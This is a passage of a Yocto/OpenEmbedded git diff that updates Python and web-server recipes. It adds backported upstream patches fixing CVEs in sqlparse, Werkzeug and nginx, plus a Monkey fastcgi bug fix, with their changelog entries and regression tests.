${PYTHON_PN}-pyserial \ ${PYTHON_PN}-robotframework \ " - -BBCLASSEXTEND = "native nativesdk" diff --git a/meta-python/recipes-devtools/python/python3-snappy_0.6.1.bb b/meta-python/recipes-devtools/python/python3-snappy_0.6.1.bb index 8a30f7cb78..bd0979d0b4 100644 --- a/meta-python/recipes-devtools/python/python3-snappy_0.6.1.bb +++ b/meta-python/recipes-devtools/python/python3-snappy_0.6.1.bb @@ -11,5 +11,3 @@ inherit pypi setuptools3 PYPI_PACKAGE = "python-snappy" RDEPENDS:${PN} += "snappy" - -BBCLASSEXTEND = "native nativesdk" diff --git a/meta-python/recipes-devtools/python/python3-soupsieve_2.3.1.bb b/meta-python/recipes-devtools/python/python3-soupsieve_2.3.1.bb index 7cb76b426f..631a45c99e 100644 --- a/meta-python/recipes-devtools/python/python3-soupsieve_2.3.1.bb +++ b/meta-python/recipes-devtools/python/python3-soupsieve_2.3.1.bb @@ -12,10 +12,6 @@ SRC_URI += " \ file://run-ptest \ " -RDEPENDS:${PN} += "\ - ${PYTHON_PN}-beautifulsoup4 \ -" - RDEPENDS:${PN}-ptest += " \ ${PYTHON_PN}-pytest \ ${PYTHON_PN}-beautifulsoup4 \ diff --git a/meta-python/recipes-devtools/python/python3-sqlparse/CVE-2023-30608.patch b/meta-python/recipes-devtools/python/python3-sqlparse/CVE-2023-30608.patch new file mode 100644 index 0000000000..41dbf088e1 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-sqlparse/CVE-2023-30608.patch @@ -0,0 +1,75 @@ +From fa1cc25e1967228e5d47b9ddb626cc82dba92d7e Mon Sep 17 00:00:00 2001 +From: Andi Albrecht <albrecht.andi@gmail.com> +Date: Wed, 31 May 2023 12:29:07 +0000 +Subject: [PATCH] Remove unnecessary parts in regex for bad escaping. + +The regex tried to deal with situations where escaping in the +SQL to be parsed was suspicious. + +CVE: CVE-2023-30608 + +Upstream-Status: Backport [https://github.com/andialbrecht/sqlparse/commit/c457abd5f097dd13fb21543381e7cfafe7d31cfb] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + CHANGELOG | 15 +++++++++++++++ + sqlparse/keywords.py | 4 ++-- + tests/test_split.py | 4 ++-- + 3 files changed, 19 insertions(+), 4 deletions(-) + +diff --git a/CHANGELOG b/CHANGELOG +index 65e03fc..a584003 100644 +--- a/CHANGELOG ++++ b/CHANGELOG +@@ -1,3 +1,18 @@ ++Backport CVE-2023-30608 Fix ++--------------------------- ++ ++Notable Changes ++ ++* IMPORTANT: This release fixes a security vulnerability in the ++ parser where a regular expression vulnerable to ReDOS (Regular ++ Expression Denial of Service) was used. See the security advisory ++ for details: https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-rrm6-wvj7-cwh2 ++ The vulnerability was discovered by @erik-krogh from GitHub ++ Security Lab (GHSL). Thanks for reporting! ++ ++* Fix regular expressions for string parsing. ++ ++ + Release 0.4.2 (Sep 10, 2021) + ---------------------------- + +diff --git a/sqlparse/keywords.py b/sqlparse/keywords.py +index 6850628..4e97477 100644 +--- a/sqlparse/keywords.py ++++ b/sqlparse/keywords.py +@@ -66,9 +66,9 @@ SQL_REGEX = { + (r'(?![_A-ZÀ-Ü])-?(\d+(\.\d*)|\.\d+)(?![_A-ZÀ-Ü])', + tokens.Number.Float), + (r'(?![_A-ZÀ-Ü])-?\d+(?![_A-ZÀ-Ü])', tokens.Number.Integer), +- (r"'(''|\\\\|\\'|[^'])*'", tokens.String.Single), ++ (r"'(''|\\'|[^'])*'", tokens.String.Single), + # not a real string literal in ANSI SQL: +- (r'"(""|\\\\|\\"|[^"])*"', tokens.String.Symbol), ++ (r'"(""|\\"|[^"])*"', tokens.String.Symbol), + (r'(""|".*?[^\\]")', tokens.String.Symbol), + # sqlite names can be escaped with [square brackets]. left bracket + # cannot be preceded by word character or a right bracket -- +diff --git a/tests/test_split.py b/tests/test_split.py +index a9d7576..e79750e 100644 +--- a/tests/test_split.py ++++ b/tests/test_split.py +@@ -18,8 +18,8 @@ def test_split_semicolon(): + + + def test_split_backslash(): +- stmts = sqlparse.parse(r"select '\\'; select '\''; select '\\\'';") +- assert len(stmts) == 3 ++ stmts = sqlparse.parse("select '\'; select '\'';") ++ assert len(stmts) == 2 + + + @pytest.mark.parametrize('fn', ['function.sql', +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-sqlparse_0.4.2.bb b/meta-python/recipes-devtools/python/python3-sqlparse_0.4.2.bb index 0980ff9c24..b5cc41e730 100644 --- a/meta-python/recipes-devtools/python/python3-sqlparse_0.4.2.bb +++ b/meta-python/recipes-devtools/python/python3-sqlparse_0.4.2.bb @@ -6,6 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2b136f573f5386001ea3b7b9016222fc" SRC_URI += "file://0001-sqlparse-change-shebang-to-python3.patch \ file://run-ptest \ + file://CVE-2023-30608.patch \ " SRC_URI[sha256sum] = "0c00730c74263a94e5a9919ade150dfc3b19c574389985446148402998287dae" diff --git a/meta-python/recipes-devtools/python/python3-txaio_22.2.1.bb b/meta-python/recipes-devtools/python/python3-txaio_22.2.1.bb index e2102695ec..50f14b17fd 100644 --- a/meta-python/recipes-devtools/python/python3-txaio_22.2.1.bb +++ b/meta-python/recipes-devtools/python/python3-txaio_22.2.1.bb @@ -10,5 +10,3 @@ inherit pypi setuptools3 RDEPENDS:${PN} += " \ ${PYTHON_PN}-twisted \ " - -BBCLASSEXTEND = "native nativesdk" diff --git a/meta-python/recipes-devtools/python/python3-werkzeug/CVE-2023-23934.patch b/meta-python/recipes-devtools/python/python3-werkzeug/CVE-2023-23934.patch new file mode 100644 index 0000000000..3a0f4324a1 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-werkzeug/CVE-2023-23934.patch @@ -0,0 +1,117 @@ +From db1457abec7fe27148673f5f8bfdf5c52eb7f29f Mon Sep 17 00:00:00 2001 +From: David Lord <davidism@gmail.com> +Date: Wed, 10 May 2023 11:33:18 +0000 +Subject: [PATCH] Merge pull request from GHSA-px8h-6qxv-m22q + +don't strip leading `=` when parsing cookie + +"src/werkzeug/sansio/http.py" file is not available in the current recipe +version 2.1.1 and this has been introduced from 2.2.0 version. Before 2.2.0 +version, this http.py file was only available in the "src/werkzeug/http.py" +and we could see the same functions available there which are getting modified +in the CVE fix commit. Hence, modifying the same at "src/werkzeug/http.py" file. + +CVE: CVE-2023-23934 + +Upstream-Status: Backport [https://github.com/pallets/werkzeug/commit/cf275f42acad1b5950c50ffe8ef58fe62cdce028] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + CHANGES.rst | 3 +++ + src/werkzeug/_internal.py | 13 +++++++++---- + src/werkzeug/http.py | 4 ---- + tests/test_http.py | 4 +++- + 4 files changed, 15 insertions(+), 9 deletions(-) + +diff --git a/CHANGES.rst b/CHANGES.rst +index 6e809ba..13ef75b 100644 +--- a/CHANGES.rst ++++ b/CHANGES.rst +@@ -4,6 +4,9 @@ + ``RequestEntityTooLarge`` exception is raised on parsing. This mitigates a DoS + attack where a larger number of form/file parts would result in disproportionate + resource use. ++- A cookie header that starts with ``=`` is treated as an empty key and discarded, ++ rather than stripping the leading ``==``. ++ + + Version 2.1.1 + ------------- +diff --git a/src/werkzeug/_internal.py b/src/werkzeug/_internal.py +index a8b3523..d6290ba 100644 +--- a/src/werkzeug/_internal.py ++++ b/src/werkzeug/_internal.py +@@ -34,7 +34,7 @@ _quote_re = re.compile(rb"[\\].") + _legal_cookie_chars_re = rb"[\w\d!#%&\'~_`><@,:/\$\*\+\-\.\^\|\)\(\?\}\{\=]" + _cookie_re = re.compile( + rb""" +- (?P<key>[^=;]+) ++ (?P<key>[^=;]*) + (?:\s*=\s* + (?P<val> + "(?:[^\\"]|\\.)*" | +@@ -382,16 +382,21 @@ def _cookie_parse_impl(b: bytes) -> t.Iterator[t.Tuple[bytes, bytes]]: + """Lowlevel cookie parsing facility that operates on bytes.""" + i = 0 + n = len(b) ++ b += b";" + + while i < n: +- match = _cookie_re.search(b + b";", i) ++ match = _cookie_re.match(b, i) ++ + if not match: + break + +- key = match.group("key").strip() +- value = match.group("val") or b"" + i = match.end(0) ++ key = match.group("key").strip() ++ ++ if not key: ++ continue + ++ value = match.group("val") or b"" + yield key, _cookie_unquote(value) + + +diff --git a/src/werkzeug/http.py b/src/werkzeug/http.py +index 9369900..ae133e3 100644 +--- a/src/werkzeug/http.py ++++ b/src/werkzeug/http.py +@@ -1205,10 +1205,6 @@ def parse_cookie( + def _parse_pairs() -> t.Iterator[t.Tuple[str, str]]: + for key, val in _cookie_parse_impl(header): # type: ignore + key_str = _to_str(key, charset, errors, allow_none_charset=True) +- +- if not key_str: +- continue +- + val_str = _to_str(val, charset, errors, allow_none_charset=True) + yield key_str, val_str + +diff --git a/tests/test_http.py b/tests/test_http.py +index 5936bfa..59cc179 100644 +--- a/tests/test_http.py ++++ b/tests/test_http.py +@@ -427,7 +427,8 @@ class TestHTTPUtility: + def test_parse_cookie(self): + cookies = http.parse_cookie( + "dismiss-top=6; CP=null*; PHPSESSID=0a539d42abc001cdc762809248d4beed;" +- 'a=42; b="\\";"; ; fo234{=bar;blub=Blah; "__Secure-c"=d' ++ 'a=42; b="\\";"; ; fo234{=bar;blub=Blah; "__Secure-c"=d;' ++ "==__Host-eq=bad;__Host-eq=good;" + ) + assert cookies.to_dict() == { + "CP": "null*", +@@ -438,6 +439,7 @@ class TestHTTPUtility: + "fo234{": "bar", + "blub": "Blah", + '"__Secure-c"': "d", ++ "__Host-eq": "good", + } + + def test_dump_cookie(self): +-- +2.40.0 + diff --git a/meta-python/recipes-devtools/python/python3-werkzeug/CVE-2023-25577.patch b/meta-python/recipes-devtools/python/python3-werkzeug/CVE-2023-25577.patch new file mode 100644 index 0000000000..61551d8fca --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-werkzeug/CVE-2023-25577.patch @@ -0,0 +1,231 @@ +From 5a56cdcbaec2153cd67596c6c2c8056e1ea5ed56 Mon Sep 17 00:00:00 2001 +From: David Lord <davidism@gmail.com> +Date: Tue, 2 May 2023 11:31:10 +0000 +Subject: [PATCH] Merge pull request from GHSA-xg9f-g7g7-2323 + +limit the maximum number of multipart form parts + +CVE: CVE-2023-25577 + +Upstream-Status: Backport [https://github.com/pallets/werkzeug/commit/517cac5a804e8c4dc4ed038bb20dacd038e7a9f1] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + CHANGES.rst | 5 +++++ + docs/request_data.rst | 37 +++++++++++++++++--------------- + src/werkzeug/formparser.py | 12 ++++++++++- + src/werkzeug/sansio/multipart.py | 8 +++++++ + src/werkzeug/wrappers/request.py | 8 +++++++ + tests/test_formparser.py | 9 ++++++++ + 6 files changed, 61 insertions(+), 18 deletions(-) + +diff --git a/CHANGES.rst b/CHANGES.rst +index a351d7c..6e809ba 100644 +--- a/CHANGES.rst ++++ b/CHANGES.rst +@@ -1,5 +1,10 @@ + .. currentmodule:: werkzeug + ++- Specify a maximum number of multipart parts, default 1000, after which a ++ ``RequestEntityTooLarge`` exception is raised on parsing. This mitigates a DoS ++ attack where a larger number of form/file parts would result in disproportionate ++ resource use. ++ + Version 2.1.1 + ------------- + +diff --git a/docs/request_data.rst b/docs/request_data.rst +index 83c6278..e55841e 100644 +--- a/docs/request_data.rst ++++ b/docs/request_data.rst +@@ -73,23 +73,26 @@ read the stream *or* call :meth:`~Request.get_data`. + Limiting Request Data + --------------------- + +-To avoid being the victim of a DDOS attack you can set the maximum +-accepted content length and request field sizes. The :class:`Request` +-class has two attributes for that: :attr:`~Request.max_content_length` +-and :attr:`~Request.max_form_memory_size`. +- +-The first one can be used to limit the total content length. For example +-by setting it to ``1024 * 1024 * 16`` the request won't accept more than +-16MB of transmitted data. +- +-Because certain data can't be moved to the hard disk (regular post data) +-whereas temporary files can, there is a second limit you can set. The +-:attr:`~Request.max_form_memory_size` limits the size of `POST` +-transmitted form data. By setting it to ``1024 * 1024 * 2`` you can make +-sure that all in memory-stored fields are not more than 2MB in size. +- +-This however does *not* affect in-memory stored files if the +-`stream_factory` used returns a in-memory file. ++The :class:`Request` class provides a few attributes to control how much data is ++processed from the request body. This can help mitigate DoS attacks that craft the ++request in such a way that the server uses too many resources to handle it. Each of ++these limits will raise a :exc:`~werkzeug.exceptions.RequestEntityTooLarge` if they are ++exceeded. ++ ++- :attr:`~Request.max_content_length` Stop reading request data after this number ++ of bytes. It's better to configure this in the WSGI server or HTTP server, rather ++ than the WSGI application. ++- :attr:`~Request.max_form_memory_size` Stop reading request data if any form part is ++ larger than this number of bytes. While file parts can be moved to disk, regular ++ form field data is stored in memory only. ++- :attr:`~Request.max_form_parts` Stop reading request data if more than this number ++ of parts are sent in multipart form data. This is useful to stop a very large number ++ of very small parts, especially file parts. The default is 1000. ++ ++Using Werkzeug to set these limits is only one layer of protection. WSGI servers ++and HTTPS servers should set their own limits on size and timeouts. The operating system ++or container manager should set limits on memory and processing time for server ++processes. + + + How to extend Parsing? +diff --git a/src/werkzeug/formparser.py b/src/werkzeug/formparser.py +index 10d58ca..bebb2fc 100644 +--- a/src/werkzeug/formparser.py ++++ b/src/werkzeug/formparser.py +@@ -179,6 +179,8 @@ class FormDataParser: + :param cls: an optional dict class to use. If this is not specified + or `None` the default :class:`MultiDict` is used. + :param silent: If set to False parsing errors will not be caught. ++ :param max_form_parts: The maximum number of parts to be parsed. If this is ++ exceeded, a :exc:`~exceptions.RequestEntityTooLarge` exception is raised. + """ + + def __init__( +@@ -190,6 +192,8 @@ class FormDataParser: + max_content_length: t.Optional[int] = None, + cls: t.Optional[t.Type[MultiDict]] = None, + silent: bool = True, ++ *, ++ max_form_parts: t.Optional[int] = None, + ) -> None: + if stream_factory is None: + stream_factory = default_stream_factory +@@ -199,6 +203,7 @@ class FormDataParser: + self.errors = errors + self.max_form_memory_size = max_form_memory_size + self.max_content_length = max_content_length ++ self.max_form_parts = max_form_parts + + if cls is None: + cls = MultiDict +@@ -281,6 +286,7 @@ class FormDataParser: + self.errors, + max_form_memory_size=self.max_form_memory_size, + cls=self.cls, ++ max_form_parts=self.max_form_parts, + ) + boundary = options.get("boundary", "").encode("ascii") + +@@ -346,10 +352,12 @@ class MultiPartParser: + max_form_memory_size: t.Optional[int] = None, + cls: t.Optional[t.Type[MultiDict]] = None, + buffer_size: int = 64 * 1024, ++ max_form_parts: t.Optional[int] = None, + ) -> None: + self.charset = charset + self.errors = errors + self.max_form_memory_size = max_form_memory_size ++ self.max_form_parts = max_form_parts + + if stream_factory is None: + stream_factory = default_stream_factory +@@ -409,7 +417,9 @@ class MultiPartParser: + [None], + ) + +- parser = MultipartDecoder(boundary, self.max_form_memory_size) ++ parser = MultipartDecoder( ++ boundary, self.max_form_memory_size, max_parts=self.max_form_parts ++ ) + + fields = [] + files = [] +diff --git a/src/werkzeug/sansio/multipart.py b/src/werkzeug/sansio/multipart.py +index 2d54422..e7d742b 100644 +--- a/src/werkzeug/sansio/multipart.py ++++ b/src/werkzeug/sansio/multipart.py +@@ -83,10 +83,13 @@ class MultipartDecoder: + self, + boundary: bytes, + max_form_memory_size: Optional[int] = None, ++ *, ++ max_parts: Optional[int] = None, + ) -> None: + self.buffer = bytearray() + self.complete = False + self.max_form_memory_size = max_form_memory_size ++ self.max_parts = max_parts + self.state = State.PREAMBLE + self.boundary = boundary + +@@ -113,6 +116,7 @@ class MultipartDecoder: + % (LINE_BREAK, re.escape(boundary), LINE_BREAK, LINE_BREAK), + re.MULTILINE, + ) ++ self._parts_decoded = 0 + + def last_newline(self) -> int: + try: +@@ -177,6 +181,10 @@ class MultipartDecoder: + name=name, + ) + self.state = State.DATA ++ self._parts_decoded += 1 ++ ++ if self.max_parts is not None and self._parts_decoded > self.max_parts: ++ raise RequestEntityTooLarge() + + elif self.state == State.DATA: + if self.buffer.find(b"--" + self.boundary) == -1: +diff --git a/src/werkzeug/wrappers/request.py b/src/werkzeug/wrappers/request.py +index 57b739c..a6d5429 100644 +--- a/src/werkzeug/wrappers/request.py ++++ b/src/werkzeug/wrappers/request.py +@@ -83,6 +83,13 @@ class Request(_SansIORequest): + #: .. versionadded:: 0.5 + max_form_memory_size: t.Optional[int] = None + ++ #: The maximum number of multipart parts to parse, passed to ++ #: :attr:`form_data_parser_class`. Parsing form data with more than this ++ #: many parts will raise :exc:`~.RequestEntityTooLarge`. ++ #: ++ #: .. versionadded:: 2.2.3 ++ max_form_parts = 1000 ++ + #: The form data parser that should be used. Can be replaced to customize + #: the form date parsing. + form_data_parser_class: t.Type[FormDataParser] = FormDataParser +@@ -246,6 +253,7 @@ class Request(_SansIORequest): + self.max_form_memory_size, + self.max_content_length, + self.parameter_storage_class, ++ max_form_parts=self.max_form_parts, + ) + + def _load_form_data(self) -> None: +diff --git a/tests/test_formparser.py b/tests/test_formparser.py +index 5fc803e..834324f 100644 +--- a/tests/test_formparser.py ++++ b/tests/test_formparser.py +@@ -127,6 +127,15 @@ class TestFormParser: + req.max_form_memory_size = 400 + assert req.form["foo"] == "Hello World" + ++ req = Request.from_values( ++ input_stream=io.BytesIO(data), ++ content_length=len(data), ++ content_type="multipart/form-data; boundary=foo", ++ method="POST", ++ ) ++ req.max_form_parts = 1 ++ pytest.raises(RequestEntityTooLarge, lambda: req.form["foo"]) ++ + def test_missing_multipart_boundary(self): + data = ( + b"--foo\r\nContent-Disposition: form-field; name=foo\r\n\r\n" +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-werkzeug_2.1.1.bb b/meta-python/recipes-devtools/python/python3-werkzeug_2.1.1.bb index 476a3a5964..fc0789a73e 100644 --- a/meta-python/recipes-devtools/python/python3-werkzeug_2.1.1.bb +++ b/meta-python/recipes-devtools/python/python3-werkzeug_2.1.1.bb @@ -12,6 +12,9 @@ LIC_FILES_CHKSUM = "file://LICENSE.rst;md5=5dc88300786f1c214c1e9827a5229462" PYPI_PACKAGE = "Werkzeug" +SRC_URI += "file://CVE-2023-25577.patch \ + file://CVE-2023-23934.patch" + SRC_URI[sha256sum] = "f8e89a20aeabbe8a893c24a461d3ee5dad2123b05cc6abd73ceed01d39c3ae74" inherit pypi setuptools3 diff --git a/meta-python/recipes-extended/python-blivet/python3-blivetgui_2.3.0.bb b/meta-python/recipes-extended/python-blivet/python3-blivetgui_2.3.0.bb index 29e7a267d2..36ab065b51 100644 --- a/meta-python/recipes-extended/python-blivet/python3-blivetgui_2.3.0.bb +++ b/meta-python/recipes-extended/python-blivet/python3-blivetgui_2.3.0.bb @@ -9,7 +9,7 @@ S = "${WORKDIR}/git" B = "${S}" SRCREV = "42512ee48494cee71febf04078d9774f0146a085" -SRC_URI = "git://github.com/storaged-project/blivet-gui.git;branch=master;protocol=https \ +SRC_URI = "git://github.com/storaged-project/blivet-gui.git;branch=main;protocol=https \ file://0001-Use-setuptools-instead-of-distutils-in-setup.py.patch \ file://0002-Use-symbolic-list-add-and-edit-icons.patch \ " diff --git a/meta-python/recipes-extended/python-cson/python3-cson_git.bb b/meta-python/recipes-extended/python-cson/python3-cson_git.bb index c4fcc61ec0..1187d12af8 100644 --- a/meta-python/recipes-extended/python-cson/python3-cson_git.bb +++ b/meta-python/recipes-extended/python-cson/python3-cson_git.bb @@ -12,8 +12,7 @@ SRC_URI = "git://github.com/gt3389b/python-cson.git;branch=master;protocol=https S = "${WORKDIR}/git" -RDEPENDS:${PN}:class-native = "" -DEPENDS:append:class-native = " python-native " +RDEPENDS:${PN} = "python3-json" inherit setuptools3 diff --git a/meta-python/recipes-extended/pywbemtools/python3-pywbemtools_1.0.0.bb b/meta-python/recipes-extended/pywbemtools/python3-pywbemtools_1.0.0.bb index 3a9f0ad6fd..976dd12d52 100644 --- a/meta-python/recipes-extended/pywbemtools/python3-pywbemtools_1.0.0.bb +++ b/meta-python/recipes-extended/pywbemtools/python3-pywbemtools_1.0.0.bb @@ -35,5 +35,3 @@ RDEPENDS:${PN}:class-target += "\ ${PYTHON_PN}-nocaselist \ ${PYTHON_PN}-custom-inherit \ " - -BBCLASSEXTEND = "native" diff --git a/meta-webserver/recipes-httpd/apache2/apache2_2.4.54.bb b/meta-webserver/recipes-httpd/apache2/apache2_2.4.58.bb index 37d498f52e..84b19de592 100644 --- a/meta-webserver/recipes-httpd/apache2/apache2_2.4.54.bb +++ b/meta-webserver/recipes-httpd/apache2/apache2_2.4.58.bb @@ -27,7 +27,7 @@ SRC_URI:append:class-target = " \ " LIC_FILES_CHKSUM = "file://LICENSE;md5=bddeddfac80b2c9a882241d008bb41c3" -SRC_URI[sha256sum] = "eb397feeefccaf254f8d45de3768d9d68e8e73851c49afd5b7176d1ecf80c340" +SRC_URI[sha256sum] = "fa16d72a078210a54c47dd5bef2f8b9b8a01d94909a51453956b3ec6442ea4c5" S = "${WORKDIR}/httpd-${PV}" @@ -35,7 +35,7 @@ inherit autotools update-rc.d pkgconfig systemd update-alternatives DEPENDS = "openssl expat pcre apr apr-util apache2-native " -CVE_PRODUCT = "http_server" +CVE_PRODUCT = "apache:http_server" SSTATE_SCAN_FILES += "apxs config_vars.mk config.nice" diff --git a/meta-webserver/recipes-httpd/apache2/files/apache2-volatile.conf b/meta-webserver/recipes-httpd/apache2/files/apache2-volatile.conf index ff2c587046..0852a8859a 100644 --- a/meta-webserver/recipes-httpd/apache2/files/apache2-volatile.conf +++ b/meta-webserver/recipes-httpd/apache2/files/apache2-volatile.conf @@ -1,2 +1,2 @@ -d /var/run/apache2 0755 root root - +d /run/apache2 0755 root root - d /var/log/apache2 0755 root root - diff --git a/meta-webserver/recipes-httpd/monkey/files/0001-fastcgi-Use-value-instead-of-address-of-sin6_port.patch b/meta-webserver/recipes-httpd/monkey/files/0001-fastcgi-Use-value-instead-of-address-of-sin6_port.patch new file mode 100644 index 0000000000..f4bab49aa7 --- /dev/null +++ b/meta-webserver/recipes-httpd/monkey/files/0001-fastcgi-Use-value-instead-of-address-of-sin6_port.patch @@ -0,0 +1,30 @@ +From 7f724bbafbb1e170401dd5de201273ab8c8bc75f Mon Sep 17 00:00:00 2001 +From: Khem Raj <raj.khem@gmail.com> +Date: Sun, 28 Aug 2022 14:24:02 -0700 +Subject: [PATCH] fastcgi: Use value instead of address of sin6_port + +This seems to be wrongly assigned where ipv4 sin_port is +equated to address of sin6_port and not value of sin6_port + +Upstream-Status: Submitted [https://github.com/monkey/monkey/pull/375] +Signed-off-by: Khem Raj <raj.khem@gmail.com> +--- + plugins/fastcgi/fcgi_handler.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/plugins/fastcgi/fcgi_handler.c b/plugins/fastcgi/fcgi_handler.c +index 9e095e3c..e8e1eec1 100644 +--- a/plugins/fastcgi/fcgi_handler.c ++++ b/plugins/fastcgi/fcgi_handler.c +@@ -245,7 +245,7 @@ static inline int fcgi_add_param_net(struct fcgi_handler *handler) + struct sockaddr_in *s4 = (struct sockaddr_in *)&addr4; + memset(&addr4, 0, sizeof(addr4)); + addr4.sin_family = AF_INET; +- addr4.sin_port = &s->sin6_port; ++ addr4.sin_port = s->sin6_port; + memcpy(&addr4.sin_addr.s_addr, + s->sin6_addr.s6_addr + 12, + sizeof(addr4.sin_addr.s_addr)); +-- +2.37.2 + diff --git a/meta-webserver/recipes-httpd/monkey/monkey_1.6.9.bb b/meta-webserver/recipes-httpd/monkey/monkey_1.6.9.bb index fff406a3f2..d3e22757c4 100644 --- a/meta-webserver/recipes-httpd/monkey/monkey_1.6.9.bb +++ b/meta-webserver/recipes-httpd/monkey/monkey_1.6.9.bb @@ -7,11 +7,13 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2ee41112a44fe7014dce33e26468ba93" SECTION = "net" -SRC_URI = "http://monkey-project.com/releases/1.6/monkey-${PV}.tar.gz \ +SRC_URI = "git://github.com/monkey/monkey;branch=1.6;protocol=https \ + file://0001-fastcgi-Use-value-instead-of-address-of-sin6_port.patch \ file://monkey.service \ file://monkey.init" -SRC_URI[sha256sum] = "f1122e89cda627123286542b0a18fcaa131cbe9d4f5dd897d9455157289148fb" +SRCREV = "7999b487fded645381d387ec0e057e92407b0d2c" +S = "${WORKDIR}/git" UPSTREAM_CHECK_URI = "https://github.com/monkey/monkey/releases" UPSTREAM_CHECK_REGEX = "v(?P<pver>\d+(\.\d+)+).tar.gz" diff --git a/meta-webserver/recipes-httpd/nginx/files/0001-HTTP-2-per-iteration-stream-handling-limit.patch b/meta-webserver/recipes-httpd/nginx/files/0001-HTTP-2-per-iteration-stream-handling-limit.patch new file mode 100644 index 0000000000..7dd1e721c0 --- /dev/null +++ b/meta-webserver/recipes-httpd/nginx/files/0001-HTTP-2-per-iteration-stream-handling-limit.patch @@ -0,0 +1,92 @@ +From 2b9667f36551406169e3e2a6a774466ac70a83c0 Mon Sep 17 00:00:00 2001 +From: Maxim Dounin <mdounin@mdounin.ru> +Date: Tue, 10 Oct 2023 15:13:39 +0300 +Subject: [PATCH] HTTP/2: per-iteration stream handling limit. + +To ensure that attempts to flood servers with many streams are detected +early, a limit of no more than 2 * max_concurrent_streams new streams per one +event loop iteration was introduced. This limit is applied even if +max_concurrent_streams is not yet reached - for example, if corresponding +streams are handled synchronously or reset. + +Further, refused streams are now limited to maximum of max_concurrent_streams +and 100, similarly to priority_limit initial value, providing some tolerance +to clients trying to open several streams at the connection start, yet +low tolerance to flooding attempts. + +Upstream-Status: Backport +[https://github.com/nginx/nginx/commit/6ceef192e7af1c507826ac38a2d43f08bf265fb9] + +Reduces the impact of HTTP/2 Stream Reset flooding in the nginx product +(CVE-2023-44487). + +See: https://www.nginx.com/blog/http-2-rapid-reset-attack-impacting-f5-nginx-products/ + +This patch only reduces the impact and does not completely mitigate the CVE +in question, the latter being due to a design flaw in the HTTP/2 protocol +itself. For transparancy reasons I therefore opted to not mark the +CVE as resolved, so that integrators can decide for themselves, wheither to +enable HTTP/2 support or allow HTTP/1.1 connections only. + +Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu> +--- + src/http/v2/ngx_http_v2.c | 15 +++++++++++++++ + src/http/v2/ngx_http_v2.h | 2 ++ + 2 files changed, 17 insertions(+) + +diff --git a/src/http/v2/ngx_http_v2.c b/src/http/v2/ngx_http_v2.c +index 3611a2e50..291677aca 100644 +--- a/src/http/v2/ngx_http_v2.c ++++ b/src/http/v2/ngx_http_v2.c +@@ -361,6 +361,7 @@ ngx_http_v2_read_handler(ngx_event_t *rev) + ngx_log_debug0(NGX_LOG_DEBUG_HTTP, c->log, 0, "http2 read handler"); + + h2c->blocked = 1; ++ h2c->new_streams = 0; + + if (c->close) { + c->close = 0; +@@ -1320,6 +1321,14 @@ ngx_http_v2_state_headers(ngx_http_v2_connection_t *h2c, u_char *pos, + goto rst_stream; + } + ++ if (h2c->new_streams++ >= 2 * h2scf->concurrent_streams) { ++ ngx_log_error(NGX_LOG_INFO, h2c->connection->log, 0, ++ "client sent too many streams at once"); ++ ++ status = NGX_HTTP_V2_REFUSED_STREAM; ++ goto rst_stream; ++ } ++ + if (!h2c->settings_ack + && !(h2c->state.flags & NGX_HTTP_V2_END_STREAM_FLAG) + && h2scf->preread_size < NGX_HTTP_V2_DEFAULT_WINDOW) +@@ -1385,6 +1394,12 @@ ngx_http_v2_state_headers(ngx_http_v2_connection_t *h2c, u_char *pos, + + rst_stream: + ++ if (h2c->refused_streams++ > ngx_max(h2scf->concurrent_streams, 100)) { ++ ngx_log_error(NGX_LOG_INFO, h2c->connection->log, 0, ++ "client sent too many refused streams"); ++ return ngx_http_v2_connection_error(h2c, NGX_HTTP_V2_NO_ERROR); ++ } ++ + if (ngx_http_v2_send_rst_stream(h2c, h2c->state.sid, status) != NGX_OK) { + return ngx_http_v2_connection_error(h2c, NGX_HTTP_V2_INTERNAL_ERROR); + } +diff --git a/src/http/v2/ngx_http_v2.h b/src/http/v2/ngx_http_v2.h +index 349229711..6a7aaa62c 100644 +--- a/src/http/v2/ngx_http_v2.h ++++ b/src/http/v2/ngx_http_v2.h +@@ -125,6 +125,8 @@ struct ngx_http_v2_connection_s { + ngx_uint_t processing; + ngx_uint_t frames; + ngx_uint_t idle; ++ ngx_uint_t new_streams; ++ ngx_uint_t refused_streams; + ngx_uint_t priority_limit; + + ngx_uint_t pushing; +-- +2.42.1 + diff --git a/meta-webserver/recipes-httpd/nginx/files/0001-configure-libxslt-conf.patch b/meta-webserver/recipes-httpd/nginx/files/0001-configure-libxslt-conf.patch new file mode 100644 index 0000000000..7ba2a1fb85 --- /dev/null +++ b/meta-webserver/recipes-httpd/nginx/files/0001-configure-libxslt-conf.patch @@ -0,0 +1,39 @@ +From 0c3c669464a514cf8d0cac08282ecb2b486f440f Mon Sep 17 00:00:00 2001 +From: Joe Slater <joe.slater@windriver.com> +Date: Tue, 3 Oct 2023 19:21:17 +0000 +Subject: [PATCH] configure: libxslt conf + +Modify to find libxslt related include files under sysroot. + +Upstream-Status: Pending + +Signed-off-by: Joe Slater <joe.slater@windriver.com> +--- + auto/lib/libxslt/conf | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/auto/lib/libxslt/conf b/auto/lib/libxslt/conf +index 3063ac7..eb77886 100644 +--- a/auto/lib/libxslt/conf ++++ b/auto/lib/libxslt/conf +@@ -12,7 +12,7 @@ + #include <libxslt/xsltInternals.h> + #include <libxslt/transform.h> + #include <libxslt/xsltutils.h>" +- ngx_feature_path="/usr/include/libxml2" ++ ngx_feature_path="=/usr/include/libxml2" + ngx_feature_libs="-lxml2 -lxslt" + ngx_feature_test="xmlParserCtxtPtr ctxt = NULL; + xsltStylesheetPtr sheet = NULL; +@@ -100,7 +100,7 @@ fi + ngx_feature_name=NGX_HAVE_EXSLT + ngx_feature_run=no + ngx_feature_incs="#include 